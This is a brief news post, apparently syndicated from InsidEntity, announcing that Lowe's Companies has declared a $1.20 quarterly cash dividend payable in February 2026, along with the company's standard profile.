Imagery Source: Wikimedia Commons / Miosotis Jade Information Source: Lowe’s Companies, Inc The board of directors of Lowe’s Companies, Inc. (NYSE: LOW) has declared a quarterly cash dividend of one dollar and 20 cents ($1.20) per share, payable Feb. 4, 2026, to shareholders of record as of Jan. 21, 2026. About Lowe’s Lowe’s Companies, Inc. (NYSE: LOW) is a FORTUNE® 100 home improvement company serving approximately 16 million customer transactions a week, with total fiscal 2024 sales of more than $83 billion. Lowe’s employs approximately 300,000 associates and operates over 1,700 home improvement stores, 530 branches and 130 distribution centres. Based in Mooresville, N.C., Lowe’s supports the communities it serves through programs focused on creating safe, affordable housing, improving community spaces, helping to develop the next generation of skilled trade experts and providing disaster relief to communities in need. For more information, visit Lowes.com. For the full document, click the link below Lowe’s Companies, Inc Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.

The post Lowe’s Companies, Inc: Declares Cash Dividend appeared first on InsidEntity.

]]>